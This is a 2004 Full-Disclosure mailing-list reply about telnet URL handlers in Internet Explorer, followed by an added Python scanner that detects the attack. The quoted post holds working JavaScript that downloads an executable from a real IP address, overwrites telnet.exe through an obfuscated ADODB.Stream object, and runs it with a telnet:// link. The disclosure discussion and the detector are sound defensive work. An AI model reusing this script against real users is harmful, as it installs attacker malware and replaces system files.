
Re: [Full-Disclosure] telnet URL type used in exploit



Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc., and even when I said yes to them, it didn't work.

Did you get that popup box when you tested your script below?

Darren

> In reply to the discussion found at:
> 
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
> 
> the consensus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjunction with other known exploits. Take the following code for
> example:
> 
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
> 
> payloadURL = downloadurl;
> 
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
> 
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
> 
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
> 
> location.href = "telnet://";
> 
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attacker's code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.
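
A defender's view of the script quoted above, as an added example that is not from this thread: a small Python scanner that folds the split-up string literals back together (so the ADODB.Stream ProgID hidden in bla() becomes searchable) and then flags the download / write-to-disk / protocol-handler chain as a whole rather than any single piece. The sample page, its URL and its file path are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample page modelled on the script quoted in the thread. The
# download URL and path are placeholders (assumptions), not real indicators.
SAMPLE_PAGE = '''
var downloadurl="http://placeholder.invalid/dl/payload.exe";
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
savetopath="C:\\\\WINDOWS\\\\system32\\\\telnet.exe";
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",downloadurl,0);
x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
+ "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";
'''

# A run of two or more double-quoted literals joined by '+' (newlines allowed).
_CONCAT = re.compile(r'"[^"\\]*"(?:\s*\+\s*"[^"\\]*")+')
_PIECE = re.compile(r'"([^"\\]*)"')

def fold_string_concat(js: str) -> str:
    """Collapse "A" + "D" + ... into "AD..." so split-up ProgIDs become visible."""
    return _CONCAT.sub(lambda m: '"' + "".join(_PIECE.findall(m.group(0))) + '"', js)

# Each indicator is a name and a pattern run against the folded script.
INDICATORS = {
    "activex_instantiation": re.compile(r"new\s+ActiveXObject\s*\(", re.I),
    "xmlhttp_progid": re.compile(r'"Microsoft\.XMLHTTP"', re.I),
    "adodb_stream_progid": re.compile(r'"ADODB\.Stream"', re.I),
    "write_to_disk": re.compile(r"\.SaveToFile\s*\(", re.I),
    "overwrite_system_binary": re.compile(r'system32\\+[^"\\]+\.exe"', re.I),
    "protocol_handler_launch": re.compile(r'location\.href\s*=\s*"(telnet|tn3270|rlogin|ldap):', re.I),
}

def scan_script(js: str) -> Dict[str, object]:
    """Return the indicators hit and a verdict; 'high' needs disk write plus handler launch."""
    folded = fold_string_concat(js)
    hits: List[str] = [name for name, pat in INDICATORS.items() if pat.search(folded)]
    chain = {"adodb_stream_progid", "write_to_disk", "protocol_handler_launch"}
    verdict = "high" if chain <= set(hits) else ("medium" if hits else "none")
    return {"hits": hits, "verdict": verdict}

if __name__ == "__main__":
    print(scan_script(SAMPLE_PAGE))
```

Matching on the folded text is what matters here: a plain string search for ADODB.Stream never sees the ProgID because the page only ever builds it one character at a time.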

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html